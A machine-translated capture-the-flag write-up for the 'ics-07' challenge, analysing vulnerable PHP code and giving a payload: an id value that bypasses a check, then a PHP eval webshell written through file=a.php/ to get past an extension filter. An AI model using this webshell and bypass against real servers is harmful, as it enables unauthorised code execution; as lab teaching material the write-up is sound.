Attack and defense world ----- ics-07

After getting the title , One by one

Get the source code directly , Source code php The part is divided into three parts

The first part , Judge whether there is page This parameter

<?php
    session_start();

    if (!isset($_GET[page])) {
      show_source(__FILE__);
      die();
    }// If not, enter the function , Show documents , And then the process ends 

    if (isset($_GET[page]) && $_GET[page] != 'index.php') {
      include('flag.php');
    }else {// If page Valuable , And the value is equal to index.php, it else The function of , Redirected to flag.php page 
      header('Location: ?page=flag.php');
    }

    ?>

// On the whole , This part requires a page Parameters , As long as the page Parameters for index.php that will do 

  The second part , If session If it's worth it , You can pass in two parameters

<?php
     if ($_SESSION['admin']) {
       $con = $_POST['con'];
       $file = $_POST['file'];
       $filename = "backup/".$file;//file Will be spliced to filename Next 

       if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
// Yes filename Regular filtering , The filtering condition is  .  Is all characters except line breaks ,+ That is, the previous character appears any time 
// \.  It's a match .
// p[3457]? explain  p3,p,p4,p5,p7 appear 0 Or once , 
// As a whole , Is to match to  .php,.php3,.php4,.php5,.php7,.pht,.phtml  Ending value 
          die("Bad file extension");
       }else{
            chdir('uploaded');// Switch directories to  uploaded
           $f = fopen($filename, 'w'); // With w Way to open a file , If this file exists , Just delete , Create... If it doesn't exist 
           fwrite($f, $con);//$f It's a document ,$con It's the content written in 
           fclose($f);
       }
     }
     ?>

// As a whole , Just over regular , Write a sentence 
// Because that regular matches all .php Final document , So we need to use parsing vulnerability 

The third part , The key to realizing the second part , It's about session There is a value , The third part is to session The assignment of

<?php
      if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {// adopt get Mode in id, This id Needs vary 1, And it ends with 9, It would be 1a9,1*9, As long as it's not a normal number 
        include 'config.php';
        $id = mysql_real_escape_string($_GET[id]);// Will the incoming id String parsing , Prevented sql Inject 
        $sql="select * from cetc007.user where id='$id'";
        $result = mysql_query($sql);// Query the database 
        $result = mysql_fetch_object($result);
      } else {
        $result = False;
        die();
      }

      if(!$result)die("<br >something wae wrong ! <br>");
      if($result){// If above result If it's worth it ,session Namely true, Be able to enter the second part 
        echo "id: ".$result->id."</br>";
        echo "name:".$result->user."</br>";
        $_SESSION['admin'] = True;
      }
     ?>

Combine the above three parts , The conclusion is

1. Pass in a page Parameters ,page As long as it is not equal to index.php Just fine

2. stay session by true Under the circumstances , Because there is no right con To filter , that con Directly equal to a sentence, that is

con=<[email protected]($_POST['666']);?>

Because of file It's filtered out , therefore file You need to use the knowledge points of parsing vulnerabilities ,file=a.php/.

3. In order to satisfy the if The judgment of the ,id The value of cannot be a normal integer , It needs to be like this ：1a9,1iii9, as long as 1 and 9 There is something between （ And it cannot be a normal integer , Such as 199） that will do

final payload as follows

There's a little bit of caution here url, In the second part, there is a chdir() Function of , This function is used to switch directories

chdir(uploaded) Is to switch the directory to uploaded, and filename= backup/1.php

So the address is not /backup/1.php It is uploaded/backup/1.php